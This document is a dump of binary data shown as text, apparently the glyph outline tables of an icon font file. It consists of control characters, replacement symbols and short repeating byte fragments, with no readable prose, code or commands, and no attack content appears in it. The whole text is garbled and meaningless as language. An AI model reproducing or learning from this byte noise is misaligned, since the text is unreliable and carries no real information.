`������2&6?62&'&6?6?64'&"2?6"++,�"^!!!�@��		�(�3H��-~--�"""_!�?��		�*�K5��-����(#!"&5463!2264&"4/&+";25����6%%6%���>��`��%6%%6h����2#!"&5463������`����/"&=463!2#"&=463!2#"&=463!2#		�		�`		�		�`		�		<	(		(	�	(		(	�	(		(	���'7G"&4622"&42"&4"&=463!2#"&=463!2#"&=463!2#`(((((((�		`		��		`		��		`		t((�((�((	(		(	�	(		(	�	(		(	�����=hx��4;57#/&?6;232+"54>54#"/&763232+"5763254+"/&?5+"=4;2#"'&"&=463!2#"&=463!2#"&=463!2#	C		'D

:�		`		��		`		��		`		4(
	T�
	�
		
		L	(		(	�	(		(	�	(		(	���.L%!"&=463!23#"&=46;232654'#&54632+"&=4&#"� 		�		�{
$*>\	-0#)N�
TC)%	.
"%�	 		 	&60	"v!=@		
����2B7"&=#"&=46;2+32>=#"&=46;2+!2#!"&=46�GU

�

L"		�

(F��		�`		<NI�	 		 	�O$�	 		 	�0F!<	 		 	���2#!"&54635#75#5#75#��`�����������`��``�``�``�``���'+/?/?/?"/&47627'�    �5555E5555b		��	
U		l	
;W3V`   `555�555�
	��		U
	l		�V3W����'/7<%2+"&5#"&5#"&5463!232264&"264&"75'#p		08P8�8P8@,d�,((\((�d,`	 	(88((88(@0dlp((((�dp��!&+2#!"&546334&#5265#264&"5"75#`

��

@%%@�B//B/`%@@%�
��

@
��%�%�8P88Ph@%�@%W9!2"/&6
	��	
	��	`9	%!"&?62!��
	��	
`	��	'�Y/&4?6�	��	A��
	��	
'�Y546&	��	?
	��	
���2#!"&5463#!#��`�������`����
��3�732"/&6%+"&?62)�ww�w�wwiw
��3�732"/&6)�ww�ww
�4�%#"&?62�ww�ww�:6#!"&=4632>76".#&'&=463!2"��`!y
	v�z4	�	1}��X	
	Ue	Y(&[	����+7#"&=4;2>3#"'&?63264&#"32��0#a6g��g_G
	"	2BIggI+Jb��N'+�͑@		",g�g'!0���7%"/&4?'"/&4?627'"/&4?62762�|(Q		s		.		s		Q(}q�}(Q		s		.		s		Q(|q����D�2#"&?#".?>;2(�.w 
�* ����
�����5EU72+"&=4637#546;5#"&=46;2+32#5##52+"&=463!2+"&=463�

`

H0�(

�

(�0�0H

`

P

`

`
`

`
P0:@
`

`
@:000P
`

`

`

`
����B�-C%'."'0.#""'.&7>75462632#"&'&>3265@57	(74�\\���/!*	�

#+
'"+$
cz



zx�!/
		����/8#"&546;6232#"6"2643+"&546;7#532�h

QJQ
�!*�h
�

�r`
B�
P
  
H!y��

0
h
&`B��`�
 053+"/&46320#41&'&7264&#"26546`�
>	`dKJg,%�%,�		.B		/&&
 GigIB2+00+2�		B.		!/����U$"&462462"7#!"&=4672654&'527267?6/546?6=4&'jKKjK��6J��@0!.!:$00 
$�KjKKj��N5--1KQ!!R

.,, 
*,���BJ2#"&'.=46?6326='.?>326=&7>264&"� gIGg7I?
	9('8
?I73.B!$			P%qEc_DY9�	
	
{(8:'z



	�9X.=+q&%P			���	
!46;235+32#"&546;�����00�`00 ��p�  P�`��������+"&537#!".54767>54675462�4&��	��		H8%:!@%q

	
C,:V

,B&,C������'7"&=463!2+##3264&!"'&763!2�(8
�5KK5 8(�  &&�!	
H@8(�
KjK(8 �&4&�� 	����'3;GSo!54;46;546;23232#";2=432=4+"#"3547#";2=44+";25'3;2=32=4+54+"#"��@
X
p
X
�((�((t(@4((�((
,h
H

H
�� ((@((�TT`(((�����'/KSX%2+"&5#"&5#"&5463!232264&"754+54+"#";;2=32264&"75'#p		08P8�8P8@,d�,((�808808�((�d,`	 	(88((88(@0dlp((�088088�((�dp���
%I3546;2335+32#"&546;4&+54&+"#";;26=3265` � ��@ 	0	 	0		0	 	0	 `00���  P�`���	0		0	 	0		0	����/%#32+535##'53535'575#5#57335#532+3 ``�0u(s0C"0@@0"C0s(u0���PE*EP������".:2#!"&5463!254&+7626=4&"26=4&"p!/Q
��


@	07	�			W			`/!�'
$*

�

(с	�E	�		�		�		�����3#!"&5463!2#"#54&+";26=3;26=4&���`p 	�	 		 	�	 		p��`D	PP		�		PP		�	����+2#!"&546354+54+"#";;2=32���@\8\\8\���`�8\\8\\�a*?62"/&4&4?62"'�``���``ш``
��``�a+7"/&4?'&4?627"/&4?'&4?>2�``���``			��``��``����A�+7"/"/&4?62'62"/"&/&47��``��``			��``���``����A�)7'&4?62762""/&4?62762��``��``��``���``�a?62"/&4 �``�ш``
��a7"/&4?'&4?62�``���``���XA("/"/&4?62��``� �``���X@(7'&4?62762"��``�`�``���@�#2+32#!"&46;7#"&5463!�H

��

H��@���00@�� ������!%%2#!"&=46;;267!463!2!p	&�&	�
=��@�� 	&&	p��P�������2#!"&5463264&"������`�� ��@�2+"&5463264&"�c��`�� ���9%2+"&=46;2+"#2+"&=46;2+"��^B

&��^B

&���B^
0
&@��B^
0
&@���92+"&=46;26=#"&=463#2+"&=46;26=#"&=463�^B

&P�^B

&P��B^
0
&@��B^
0
&@����'/7"&4622"&462"&4 "&4622"&4$2"&42"&40(((((�((��((((B((��((�((�`((�((((�((((B((����2"&4�Α�Α��Α������)2"&4"264&"26464."'.2�Α�ΑU��	
#n#
	-���Α���**6����%2"&4"264&"264>'&"762�Α�ΑU��-�-#n��Α���66*����2"&4"26424+"36264&"�Α�Α������Α���  � �`+3;2#"'##"&46354+54+"#";;2=32264&"6264&"�B^^BC/\/CB^^B`4(44(4�((l((`^�^00^�^�(44(448((4((
@�'3?KWco{���)"&5463!254+";2754+";2754+";2754+";2754+";254+";2754+";2754+";2754+";254+";2%54+";2754+";2� ��\((`((`((`((`((��((`((`((`((��(( ��`(( ��((((((((((T((((((((T((((((���.4X.'76#"&#"+"&5&546623256%5'5&'&56765767556�	2	2�;?$i>4

"!Gh0�"(#M'##&>&#7.(!?&#%% *D��	)"^

�!
#�HF
�GH	DDGFFDDHFG������$%"/&4?'&4?62#!"&=463!2����w
��

0
������

 

������+'&76'/&?6/&?'&?6=�=�}	�

�	+		[[			+		[[		+	�

@��*t	�		�	.	PP	/	.	PP	.	�		����@�076&76&'/&4&4?61'��3N>!0#9T�x�mm�

S)F/,UZR
T
��

^^
����	�6.=#"&67�/� �
�/�`�%-���7%2++"&53#"&5#"&=46;546;27#5376�

(
0
�s�
(

(
0
�s�;;`
0
(

�`

0
(

��`;;�����6>FN"&54>75.546267>767.5462$"264264&""264�
- 2
/B//B/9/B/��						�			0**	)!//!�*!//!*�	
 !///			��			7			�����/?%"&4?62?6/&?62/&?64&""'&4?620		-,~Y,-	(-*<-(		-,~Y,-	(-*<-��G�*	-,Y~,-		(-<*-�(	-,Y~,-		(-<*-����G��z�)12+"&=4>7>54&#"/.762"&4�Bn%%
H

,+?F:((:(�Z@ 1


"
![��)9))9����&735#"&=46;232+"&=462"&4p�6<**<*�0�00�*<**<����6"&46246;2+"&5�/B//Bh
^

B
1B//B/G

��


���;f2+32+"/&'+"&=46;7'#"&=46;26?632+"'&54>54&#"/&7>32		5;		>	.,	@		95		E	()	$		�



	

	1';#!	 	LT	 	HH	 	SM	 	AA@	 	%
	
.*$���;c2+32+"/&'+"&=46;7'#"&=46;26?632+"'&54>4&#"/&7>32		5;		>	.,	@		95		E	()	$		�##

	

	1';#!�	 	LT	 	HH	 	SM	 	AA��	 	/	
.*$�����%32#!"/&4762%37���`(���|PrD��(`(�(1}PC��@�K%2#"&#"".54654&#"&/054&54632>?03261
! $$#%54@p '#$#**")	2�#$##

0	M
2	20Ek��`�<6"&=4627232+"&=46;5.=46;26=463�P88P8@	WA8		�		8AW		B19T	`8(�(88(�(h	0Bc	"				"	iD(		*3NM80	������%F'&?6546326=46;22+"&=46;5.=7z	
��	
�8(,		L		�		8AW4/2


	�

	�-(8,�0		0*&�				"	iD),'"����
+!2#!"&54%#!"=46;54;2354;232�����X0(�(0��,$4444������8@6/&5#+"&=4675*.767&632347264&"��
(
�
)
	<!":
�			�t�

�!5

		L1-			���*2#"&="/&4?#"&54?>;>32264&"�D<b


3		h
1h&eH3 
�""�!2Hd'h
1
h		3


c
=C�""����"&462%2?64/764/&"gΑ�Α���ee�8�Α��V�ff�����2"&4'&"2?64�Α�Αj�ee���Α��V�ff�����6462"2?2?64/&"�Α��V�ff�YΑ�Αj�ee�����"&462764/&"'&"2��Α��V�ff�'Α�Α���ee�����B�BJ7"&?6+5#"=4;5.54632+>7#"&?6+"&'"264
DD#R044$9((7$440R#DD ���`DD'1�(
2(98'2
(�1'DDIWWI ����&2%2#!"&=46;5462+"&=4&#"54&"26���Y}Z
 
+*p""���f@ZY?

*+g�00����2"&4264&"62"&4264&"�Α�Α��ll�l�jKKjKf4&&4&��Α���l�ll��KjKKju&4&&4x�$"&46:"&4$2"&4H*<**<t<**<*��<**<*�<**<**<**<**<**<����2"&<62"462"B<**<**<**<**<**<*<**<t<**<*��<**<*����);2#!"&5463264&"265.'"3;265.'"33���,((�uS<U��~f����`��((Su#U<}�#�f����2"&4>4&/&7�Α�Αl���Α��k�����2#!"&5463!2=4#!"���,�����`��88����!"&5463!2'76/&'&���`��Fh `��b��Fh����*!"&5463!23?6/&7'&"?64���`��9�7g7 `��.�9�8	7��A�@&="'.54>3546463276#!"&546;2+!8�-?0	+-FJ/��
��y	3@�H
';(
O)*>&	H��Y`������>2"&2"&46.?67�GΑ�Αv	�B���Α��B�B����#!"&5463!2?6&+"���`��||�p��`�||����5463!2#!"&%'&;26`��d||�`���||����!2#!"&54676/&0`���||���`��||���B�E%#"&'#"&=4;&7#"&=4;>32'&#"32+32+32767	Mp!oH(>�
��
r&",VF@P,(#	
		 
��@�6%2#!"=4;5#"=4;54632'&#"32+354634��$O=7/			TT{`h(�(B7G#
$

@(3����*�A7+"&="'.?6;2654/.'&6;546;22'&+"�,-:$	 	0&"

B
g".A1	 	0&"

B
	�
T-!'0		0"	


4"1G0		0"	

	��@�4#32++"/&=46;267#"=4;&+"&=43!24I	;5L9�S�T'��)U(`(8F��5 (-(��n�:232+32++"=#"=4;5'#"=4;'&6;236?63_P:Xll8llX:PA77�� % \\ % �qH%#q����)27#32++"=#"=4;5#"=46;54;2'32654&#�\��;4444�@QQ�M$((#� (44( -�O�Qۖ)#"(��@�ENRZdh#32++"/#+"/#"=4;'#"=4;'&6;2376;2376;2327#32>?#;'&'#7#136?#4?FU*
9	+7*
9	)TF>0*
m	,
n
.0�x&Q��'Q (�		��		�( (Q		VV		VV		Q(�66/�  	66�  ����;#!"&546;#532�
�
��

Ƞ�
b8
��

�
z�b����)5>;#!"&546;54+";2=4+";254+";257#532�
�
��

�@������`�
b8
��

�
��LTz�b������&;SV%2+"&=4?061#"&=46;201'2/&6;46;2%+"/#+"&?6;23'��C9~C�PP0	 	($		+	$9(&_`;PP@		���		
�a������;SV++"&5#"&?62+"&=4?061#"&=46;2017+"/#+"&?6;23'kP0	 	0P1�C9~CT$		+	$9(&�P��		@P�n_`�		
�a�����$4DT7/&6;46;232"&=463!2#546;2+"&546;2+"&=46;2+"&�PP0	 	0-				��	�		�		@		@		�		�	5PP@		��$	 		 	p 		 		� 		 		� 		 		�����$4DT76++"&5#"&7"&=463!2#546;2+"&546;2+"&=46;2+"&PP0	 	0�				��	�		�		@		@		�		�	KPP��		@	 		 	p 		 		� 		 		� 		 		������4AV'&?6;232+"&=46;54632#"'&?67.74&#"3272'2/&6;46;25	+m
'% 02*

"]	
�PP0	 	N	):	�)0,*@
	
!	
PP@		��������4AV'&?6;232+"&=46;54632#"'&?67.74&#"3272%"&?6++"&55	+m
'% 02*

"]	
��PP0	 	N	):	�)0,*@
	
!	
�PP��		@���D72+"&=463264&"32#+"'&#"&=47>767632h

P

X e#


*!0H#5�
�

�
�y?#.) �M,:$���F46;2+"&56264&""'&'.'&=463276;23+
P

P
(#H0$

#e �

�

2��:,
(+� 
).#?$����$2"&4++"&=#"&?>;732e6%%6%�8
 
80
%%
�%6%%6��h

h�����$2"&42++"&=#"&=46;7E6%%6%p

@

%%�%6%%6k�
�

�
������/72"&4/"/&?'&4?'&67627664&"�P88P8V

^!
d0/d
!^

^!d//d
!cKKjKK 8P88P/d
!^

^!d//d
!^

^!
d�KjKKjK����".5463276EvE�j/7�]>J@EuFj�^6^y*���	%3!#!"&7;2=4+"%2#!"&=463 �
��
�hh 
	� 	
 ��
��
0		0
�����?E%+"/#54+""'"&4?&=#"&546;5'&4623762322#4
7=	
6(33(6
	=7

8/	
6�6
	/8
��\B�
 <
	7 �� 7	
< 
;.
	77	
.;B..����!"&5463!26=4&���`�|| `��d||�����2"&44&"2�Α�ΑH/B//B��Α�ΈB//B/���-C%&/#"&'&54>32+3276'#"&54673267�A>� #�		y�9%�W5Ig=2B.*?>
!	��$!	 	 {7/:gI7Y'3.B7)����:%2+"=&=4?5&=4?54;27676265463t{eP1		71		78�		��		�Fb�dp�)
)
E3)
)
�MH����3<%#!3#5#"&="=435"=435463352#!226&#"Q//4E��	�(B+*7"    "7*+B(�	E5�4
#$#��%@((@%��#$#
p((@����%=2#!"&546322>36754&#!"".'&'3!265����
J(
��
(I	I

���`�5 

 	5		5�

����%9+#!"=#"=4?622#!"=4637335335332!54;��x��
�0
8@@@@@$�`$@XX��

�����#./+"&?&54767'&47%67"&57n���	8	0
�p�p�!'"U<

ss
	"U�,q%%q,
 �`DNe7#?%2#!54+54+"#";&'&767?6'&'6732%463!!"&57;2?3;26/&+"�&�

��@@r			





 ��
��
;		<		9	 	�&&!�
��
@x
	


		



##l
��
8		
����%5EUen2+"&54632#!"&546;254&+";26=4&+";2654&+";26=4&+";2675#"&=#@

 

�

��

�
	.	�	 		 		 		 	�	 		 		 		 	 	�@
��

@
 
��

�
	.	
�� 		 		� 		 		y 		 		� 		 		w`	 �����)5=IUa2!54;463!2;2=4+";2=4+"2=4+"354+"754+";2=4+";2=4+";2��@
P
��((((4(t(�(((((( �

�8�((l((�((�TT�((l((l((����)462"6+"&=#+"&5'&462376x*<**<�	_



_	
VfV
Z<**<*P
^��

pp

^
	WW	�����(3?62#"&#"#"&546&.'&>.676.7>.>�L\>&"LM"&>,�/-	�*,�-/	�C_&&_j4--
&A7 !-4
-!7A&7!���6/&=46?7575����������N�
hh
�HNN��P�B���!'+/37%//&=4?54?65'75'57'57'�dhhdad

d"UwfffUUfffVUUfff�	n
2442
n	$l	&&	lI$E�))&��K'O�''*FK'O�''*�����8U7/;2+".?'&6?67&"/&?6276/.?+/&?6326/&?6�	(3
44$6	3)	n|	$	"
j*(	n	(�-`PP`

"
�

Q!(0A"QI

--B
n�5+0PP0!,

���7APa2++"&=!+"&=&=47#"/&6;7>;2%!'.+":>54&"!264&#":�	
 
�
 
	< �"9���9
"N	
		06

  

60		*
& *22
�!	���19BJ%+"&=!+"&=&=46?>;546;232264&"7!'.+"264&"� 
 
�
 
 +
�
+��5
�
�#0$)

  

)%0#U" 

 "�]C�������/%++"&?5#"&?#"&?#"'&?>2++z
�		`		�
P	O
nn
O	F11Z[
uu
[����##".=4632"&= "&= ��]=g<�]=g<���G2G���G2w.+!.+!{g++g1og++g1����&BKO7.4326673#!"&546;&'6'.32767326'&7#532'6�3
O��
��

�&$>$

O�
%+�(6V
	��

�
�
�$/
76 &
>"	�
�������<E;#!"&546;"&'&+"&'&+";27673;2?6.#7#532�
�
��

�9
	

%
%		&
&O�
b8
��

�
�
es		s_
	�		cX		���b����4=;#!"&546;6&+"4'&+";2767;26/7#532�
�
��

�<#%%#<<#"#<��
b8
��

�
�ED
]^=!$^��b����"=72+57#532;#!"&546;4&+";26=:>�

��
7
�
��

�5(!Q�=�
��
��

�
��!,�9����"-#5323#!"&546;"2645'&'&��
b��
��

�j''�(	g((F�b0��

�
�
((�p(h((0����*.O#5322"&5467;#!"&546;3533526/&+535#535#535##3#3#y�
�		w
�
��

h @� 2
           W
���

�
��

�
     ��&W
            a����!/=F;#!"&546;54&#";67764'&7&7647#532�
�
��

�@$$!
		O
	
)@�
b8
��

�
�l�$8$8	;n
N	*u��b����4#532;#!"&546;4&54&+";26=65��
b�
�
��

�`7
p

p
7F�b
��

�
��7&

p

&7����3G`#5323#!"&546;7654/7654/&#"32032?454/0#"764/&#"327��
b��
��

�s((AA5>>�A((F�b0��

�
�
�$$==1��g=$$����
!'2"&4%&'264&"'677&'67'�Α�Α�?�P88P8 @m?�@��Α��@�8P88P�?�@m?����#46#"&'46762654&'&5 QiBrCg�iQ:Ll�lL:��VCrC�gV�b?LllL?b�����6/&=6&'.7�
H
}@
 ���j
��P4M
Q%�,����%7#"'.?>3264&#"+"&=46632/546;2��gXD2@LllLI53�	2Hcg$A

)'͒7(l�l23	�2E��3�

h ����K+32+"&=46;5#32+"&=46;#"&=46;2+35#"&=46;2�	%%		�		&�&		�		%%		�		&�&		�	p	��	 		 	��	 		 	@	 		 	��	 		���� 2++"&5#+"&="&463�

(
 
 
 
B^_C�
 
��

X��

h^�^���#Gk%2#!+"&=#"&=46;546;2%2++"&=!"&=463!546;272++"&=#"&=46;546;2�		��	 	P		P	 	P		P	 	��		P	 	P		�	 	�		�	 	@	 				 			�	 				 			�	 				 			����%%2"&547'#"&46327&5462#"'6`(88P8f"(88("f8P88("ff�8P88(
@8P8@
(88P8@

@����5#!"&5463!2"'64'73264&"&#"327264&���`�DD!!.!D!!D!.!!p��`�))!.!!)!.!)!!.!���'/7?O"&4632762?2+"43&2"=&?6'&6/&6463264&#"26�4z�zzV-)4M0.	U	;	��&		(8		h4)-Vzz�z4<+					�&		8(		����%*"&462'7&''77'77'?6'7��Α��a?"'>KK>'#?&U%>>%U&�NN'Α�Α�:T6**6T:B4"MM"4\88\
���!-9EQ]iu�����>#"/&5417&0#"/&54+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2D��D
+W``W+`((`((`((`((`((��((`((`((`((��(( ��`((XD11D

E#
<##<
#E�(((((((((�(((((((�(((((���	3=A#546;246;#+"&=>%+"&=#532%2#546353�`	@	��
` 
`


�
`
 `		��	`	p@�00		w
��

,$;)%-9)G,,

��	w	00	�������#+54622+#5.=#"&=4637#54620		I7@7I		p@0p

p	 	 :XccX: 	 	p

@�&2>JV2#!"&546;54632=#72=4+"3!2=4+"3'2=4+"3!2=4+"372=4#!"3(
�(!
(
(��h�8�h�����
��!

����``((������,'& /&47>2"&4%'&"/&4762{"n��n"W��6%%6%"?�?"W�%"dd"Q99��%6%%6y"

66

"L����/?O_o2#!"&546354&+";26=4&+";2654&+";26=4&+";2654&+";2654&#!"3!26���P&&&&�&&&&�&&��&��`��M&&�&&{&&�&&{��ff������#/7'&?66754621%#".547>"&53z	
��	
�%=8H	�~��		�&�


	�

	p1


V:,C
��	
2�%����!2#!"&=46;76;2!+"&�		�`		x	r	�����	 		 	

�MS������82"&4654/.#"&546326?654'.#"32>�Α�Αm
#'("$
>R$C) 8��Α���"	0 !+#	R=)B&����:F2#".'#"&546326;2>54&#"3276#"&462654&#"j�JL
*,4Q9*- jNLllL6-
	=Jg��Q%$�|d?T91BVy
2JVl�l	(�Α��)) ���#?+'754"/&4?62763~�~-8  �8M
)�)
Ms~�~  8-`8PM
)�)
M�����,70#"&532762#"/&54>76�XF:@@
j UP.
@	'%?�J8@XC			
D:�a5	#8����#4?JU%"&""&#"#"&"#546;5335335332!526226226323"&546523"&546523"&54652�'/''(
'/'@@@@@�@''/''/'
'��
 
r
 
r
 
@      P�������`      @
%&
%&
%&�%2#!"54;2%6!57>��(5Z��W
U@(h����h�r����!�#%2/7+5463&'&676
=��	�
Y���<K`�wZ�S:
�A
�	���+�`\�	�2%2#!"&546;22/"//&?627'&63�		�0
	 	�	 `

I.D

II @	 	
P		�� 	v `		J.E		JJ @�2+"&463264&"264&+�PppP�PppP�KjKKj�5KK5111�p�pp�p�jKKjK�KjK7�7@�2+"&463264&"�PppP�PppP�jKKjK�p�pp�p��KjKKj������8<KQg2'.547'+#"&546327#"&54>;23'#"&=46;263&267#"&?&#"?#654&#"&/5KK54K)V
4E,5KL41
W	r3		@
N��+J(	Q-	!//�J�$�"2/!

-

-,M55JK48&�*6K64K0
			}J&vI/B/`x( 0`0"!/H
	G,���4<LT2+++"&=#+"&="&=#"&=46;5462264&"7!26=4&#!"264&"�


 
�
 



�����0

�
@
P
� 

  

 
�
P
0".."0��]
�

�
p�'?2#!"&5463&546?6'.676/&&546?6'.676/&��`�=@RA?S�>@RA@R��� �%"4./6%"4./6����94&++"&546;2+"&52+"&546;23265463�!p	0	
�8P	0	�	P8�
	0	p!	!��		�
P8�		0	��8P
		�!(	��B�3W%!!2#"&'&7#'.'4>7#"&=46;2!2'#54&+"#";;26=326=4&���
 ! �#
	FF

g
	�/t0		0		0		0		� #! !W

	-��(		(		(		(		��B�3F%!!2#"&'&7#'.'4>7#"&=46;2!2'#54+"#"?6&���
 ! �#
	FF

g
	�/y++DD� #! !W

	-��<<DD����<D%32#"'+".'#"&=463267'&6?546;546;232%7625�=,

X70�#7X

,>
F*
@
�
@
*��v
vK")

;!;

)"F
#�
(

(
�#
�X&&X����26:V%#!"&=467'&6;&5&54767>?6327/77475#"'0326762676�#��%
:@F

F@;
� 2�*2J,42.	�=#--$><!

1"		"1

!�x( �� (�������HWm2'"&547'+#"&7>767&+"&546;23'#"&=46;276;2+6267#"&?&#"%6&#"&/7>4KL64K-

TE,6KH2 8

8E�B		P&-

R ��(	Q)!//�0"1

22"+K46LK4;')-
*6M63H

( 		&*
 
7�K/B/L"2Q
R "0+���$@%"&54672654&'56&"&462"&=46;2732#+"&5pAO�ԖOA!3z�z=3M6%%6%�
&

@
v.(88(.	!!�%6%%6�
``
`

�����
)%3"/3727#'&"'&"#&6?62762@m��^9�$!w1:$f!$&n''n&�,��H		
%i(7		b�	
V(i%((''�� �!)32++"=#"=4;5.5462264&" ?1$$($$1?TxT�/B//B3N4($$(4N3<TTB//B/�� 2/"&46327'&63264&"tQTxTT<*#P�B//B/�OP#*<TTxTQ��/B//B�� �;C%32++"=#"=4;5.547&'&'&6;227676;2264&" ?1$$($$1?3&(
F
(&3�/B//B�3N4($$(4N3C+ /

/ +"B//B/����192/32++"=#"=4;5.546327'&63264&"tQ?1$$($$1?T<*#P�B//B/�OP#*3N((N3<TQ��/B//B����PX2/32++"=#"=4;5.547'/&?'&=4;276627'&63264&"�Q?1$$($$ 3			O	#T#P�B//B/�OP#*3N(((;"*#	O	Q��/B//B���!)W32++"=#"=4;5.5462264&"32++"=#"=4;5&'673264&#"&'632 ?1$$($$1?TxT�/B//B!$$($$"!//!"'2<T?3N4($$(4N3<TTB//B/�4($$(4/B/ T<3N���!N2"/"&46327'&63264&"%2"/#".'672654.#0"1677'&63T
1TxTT<*#0�B//B/�
1T<%?'!/B/%!0�O0#*<TTxT1��/B//BQO0#*<T";$!//!%!1��@�&HP2"/#"'673264&#"&'6327'&63232++"=#"=4;5.54264&"4
1T<2'"!//!"'2*#0�oxT?1$$($$1?oB//B/�O0#*<T /B/1@T<3N4($$(4N3<�/B//B��+32//"&54>327'&?67'&63264&"t			TxT'B'*#	�B//B/�O			#*<TT<'B'			��/B//B��!�,47"&47675#"&=46;5#"&?6+32+64&"�*TxT*(88('//B//�*xTTx*	(88(	�/B//B/0�P(0%&=#+"=#"&462354;2354664&"�		8(	*xTTx*	(�//B//�8(*TxT*(�/B//B/�� �+"=.5462264&" ?1(1?TxT�B//B/3N��N3<TT�/B//B0 P"264&2"&4�B//B/�xTTxT/B//BoTxTTx	���/7?OW_!"&=463!2&"264&"264!"&=463!2&"264&"264!"&=463!2&"264&"264�@

�
3NX�@

�
3NX�@

�
3N 
@

@
X�
@

@
X�
@

@
X����#+?%2++"&=#"&=46;546;2"&4622#!"&=46;27p		@	 	@		@	 	��jKKjK&7O��O7#L#�	 	@		@	 	@		@0KjKKjkO7**7O����#7%//&?'&?676"&4622#!"&=46;27N-..--..��jKKjK&7O��O7#L#�.--..-->KjKKjkO7**7O��+6"&462%2+"&=!+"&546;235463�B//B/.B	 	�	 		 	�	�/B//BQB.�		00		`		А	����'/##!"&?"&546;254&#!"3!26"264�N4?��?4NO1�2N0
��

0
�.!!.!`�'9229''99�p

p
6!.!!.����'7?G##!"&?"&546;254&+";26754&+";26"264$"264�N4?��?4NO1�2N�
h

h
�
h

h
((��((`�'9229''99�p

p

p

p
.(((( �`!%!!535#7232+#!"&=463!5 � �  

��` �@@�
�
�`�� �`!%!!535#7232+#!"&=463!5 � �  

�p�� �@@�
�
�`�� �`!%!!535#7232+#!"&=463#5 � �  

�� �@@�
�
�`�� �`!%!!535#7232+#!"&=463#5 � �  

��� �@@�
�
�`�� �`!!!535#7232+#!"&=463 � �  

� �@@�
�
���D�%#&/&546.j81
5W	w��Y	
�	�����H#"32+72#".'#"&=4632=#"=4;54".=4>32>32T$$T-.T$$T-.�0p(p1((0p(p1(���,8G32+"=!+"=4;#"=4;2!54;2+;2=4+"54++;2�(��((�(����@T
H�@��((@((���H
4��@�+]7+"=4;5#"=4;2!54;2+32+"=732+"=!+"=4;53;26=4&+5354;2+@44 44�4��4�
@

h4�4�44�4@�44H

@
H4����%"!"&5463!2+538
��

�
b
��
�
�

��7b�
���!2#!"&54633#!"&546;������0/��� �`0 �!/������47c%"&5054676762'3#"&505467>762'3'2#!"&=46;&'#"&=46;6232+KjK

<

�H��";#5K

<

ȐH		�`		�&�		�N�		�&p!//!<4&(59	��%/!<

(59	���	 		 	')	 	  	 	)������*02#2#!"&=463467.5"&=4634&"h

D55D

��

D5#7

=V=�

CkkC



Ck8O-

�@;UU;����*062#2#!"&=463467.5"&=463."65#h

D55D

��

D5#7


2<2
���

CkkC



Ck8O-

��$,,$""����*02#!"&=463467.5"&=463!2265#hD55D

��

D5#7

P
�V=��CkkC



Ck8O-



�U;;����*2#!"&=463467.5"&=463!2hD55D

��

D5#7

P
�CkkC



Ck8O-



���?2+"&=4/&=463254632354632354632346�

0�
p p
�t
d+B0�0/ ������82+"&/&>54>32354>323546323546�

�
}
!	 



@�q�!
,���ױ�W���.4635#"&46;5#"&46;5'.7>7>+"�  �в$�	
p�P	""(E
K@
� ��@�&54/&+"&=46;26?6&+"&=463!2�p�
%|

�!
N
� =G
%3	!

	��t�����7+"/.>5'&>763'&67637>376� $��!='
#
040 ,c�*
Y
~!9P�
	������������-159%+"/&>46235462354623462#37#37#3� ��
!	 """"�XX�`��!
,�((a`````������-$2+"./&6?'&>354623546234�" �@K%$E("�P�
p
	�$���   �`G2++"&=#"&=43+"/5#+"/#+"&76;236?6;2U6Ut
6		2		6A	+	+	A`+��+��
�6"UU6�(5 ����*%+5326"&462&'654+";26=3;26ۑΑ��+&jG		
,�8'Α�Α��O2Y
�

HS
����#2+32#!"&46;5#"&5463!P�

��

������  @�� ������+G!"=46;54;2354;232!2#!"&544+54+"#";;2=325��X0(�(0�L���H<(<<(< $4444$ ���<<(<<����+7!"=46;54;2354;232!2#!"&542=4+"3��X0(�(0�L���<� $4444$ ���((����+G!"=46;54;2354;232!2#!"&5476/&'&??6'��X0(�(0�L���
0			00			00			00			 $4444$ ���0			00			00			00			����+;!"=46;54;2354;232!2#!"&54'&'&?6��X0(�(0�L���Y	j.			R	�	 $4444$ ��`	j/	T�	���6#!"&546;276�
�0

p
���

�

�XD�� �	727"/2"&4724#"2546pxTTxT�&6(��!!�TxTTx6&(�����$9#!"&=46;546;23253+"&2#!"/&?6;53�+	�

�	 	�	�@	 	�

�	++	�@k,	
P
			�9pp		
P
	,,	  ��@�
4>?&576
�����	
�J
8��?
0�@�����
8����2+&=#"&5463�&&�}
`&&�&��&^T& &����'2"&454&+";26754&+";26�Α�Α�	0		0	p	0		0	��Α�η�		�		�		�		����2"&454&+";26�Α�ΑX	�		�	��Α�η�		�		����!)3#!"&535462#354&"264&"264&"``/!��!/`KjK��&4&�� ��!//! 5KK5  &&���@�*6BN%+#!"&/#"&=46;7>3'&>3254&"26754&"26'54&"26@

��

CkP�PkC
��p��
��

�mm��p

p

p

p

p

p
������CG+32++"&?#+"&?#"&?6;7#"&?6;76;2376;2327#�
OK
P
(b
)K
OK
P
(b
)K�c

�	(
V
	RV
	R	(
�	(
V
	RV
	R	���������-6"&462&"2642"&4264&"32+"&76�\BB\B\((�\BB\B\((h ��"	p�B\BB\^((�B\BB\^((��0
�
����G"264$2"&462"&46"264>."'&67673>'.56V�zz�z��Α�Α��pp�p�RHLH5	




	�z�zz���Α��Yp�pp�DM

/A.!!.A/����B#"/67'&/"&462&/&#".?5#"&=76;2|}~�?$$$ofB6

= ?��Ú
X<$$��'l�	
��P
_O		�7G7#76772+57#!"&5463!2'&+";2?3;2>74.+";26�		�/��`���9	$9	4	�-99.5�

1b_�� ��		T+�4����!3CS.676#"#'7232#"/&764'&?67/&764'&?6/&764'&?6a@-.?
@ 8  8 @�		_--
	%%	
&

;@��@
(
QZZQ
(�"V6�6
	-t-	7#X#
	B	��'/7?GOW_6"&4622"&42"&42"&42"&42"&42"&42"&42"&42"&42"&42"&4�%6%%6(6%%6%�6%%6%6%%6%��6%%6%�s%6%%6��s%6%%6��s%6%%6��S���8@H`d7"&5462"&54&"&2#"&4632654>54&""&542"&42"&4%"&54=.'.7>'7�/B/1�g?-FdFSmQ@
	Qf��"P"�!//!
�gI+	-?%&2FF2I�m�Do	�V�"P"������2At�&2#2#'&/&?6766766&#"32763&%.6767&'&>767'.7>7"'&63"&7>376"#32654&# !=+^C,:)
F
"(-+
%

	
p:)
F
"(	-+
	 !=+\C�

3

	!Y	!JZ9
	


A
4!JZ9

	


3

	!G�����8DQ7"&5462"&54&"&2#"&4632654>54&""&54%/&?6"/&?6�/B/1�g?-FdF�		W	W	��		�
		��!//!
